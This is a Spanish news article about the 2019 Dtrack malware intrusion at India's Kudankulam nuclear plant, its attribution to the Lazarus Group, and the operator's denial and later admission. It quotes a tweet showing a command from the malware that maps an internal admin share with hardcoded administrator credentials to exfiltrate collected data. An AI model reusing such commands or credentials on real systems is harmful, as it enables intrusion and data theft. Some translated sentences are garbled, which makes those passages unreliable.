La red de la central nuclear de Kudankulam (la central nuclear más grande de la India) ubicada en el estado indio de Tamil Nadu fue infectada por una pieza de malware vinculada por expertos en ciberseguridad a piratas informáticos norcoreanos. Los primeros informes de una intrusión en la planta de Kudankulam aparecieron el lunes después de que un usuario de Twitter publicara un enlace VirusTotal que apuntaba a lo que parecía ser una variante de una pieza de malware recientemente descubierta llamada Dtrack, un troyano de puerta trasera desarrollado por el Grupo Lazarus, una unidad de piratería cree para ser patrocinado por Corea del Norte.
https://t.co/aBVxrJKIao— く̱͕̘͚ず̡̭̠ (@a_tweeter_user) 28 de octubre de 2019
Interesting potential DTRACK (CC @Mao_Ware )
Dumps the data mined output via manually mapped share over SMB to RFC1918 address with a statically encoded user/pass:
> net use \\\\10.38.1.35\\C$ su.controller5kk /user:KKNPP\\administrator
La muestra de malware incluía credenciales codificadas que hacían referencia a KKNPP, el acrónimo de la central nuclear de Kudankulam. Experto en seguridad cibernética con sede en India Pukhraj Singh re tuiteó el mensaje que revela que los atacantes habían ganado acceso a nivel de control de dominio en la planta de Kudankulam y se vieron afectados que otros objetivos extremadamente de misión.
Poco después de que el incidente se hizo público, los funcionarios de KKNPP publicaron su propia declaración negando que hayan sufrido alguna infección de malware y describieron los tweets como "información falsa". Hicieron hincapié en que los sistemas de control de la planta "son independientes y no están conectados a una red cibernética externa e Internet", por lo tanto, el ataque cibernético en la planta de energía no fue posible.
Sin embargo, solo un día después de que los funcionarios de KKNPP negaran categóricamente la posibilidad del acceso de extraños a las redes internas, ya que todos estaban aislados, NPCIL, la empresa matriz de KNPP, admitió la violación de seguridad. De acuerdo con la declaración de NPCIL, la organización fue notificada de la infección el 4 de septiembre de 2019. Una investigación sobre el asunto reveló que el malware ha afectado a una de las computadoras conectadas en la red conectada a Internet que se utilizó con fines administrativos y se aisló del red interna crítica
Según una descripción del malware Dtrack del fabricante de antivirus Kaspersky, este troyano tiene un amplio conjunto de capacidades, incluida la captura de teclado, la capacidad de recuperar el historial del navegador, recopilar direcciones IP de host, información sobre redes disponibles y conexiones activas, y para enumerar todos ejecutando procesos y archivos en todos los volúmenes de disco disponibles. Las primeras muestras de la familia de malware Dtrack se observaron en ataques dirigidos a Corea del Sur en 2013 y recientemente, a principios de septiembre de este año, Dtrack se utilizó en una campaña dirigida a organizaciones financieras y de investigación en India. El análisis del código Dtrack reveló similitudes con una campaña anterior que se había relacionado con un actor de amenaza norcoreano conocido como Lazarus.
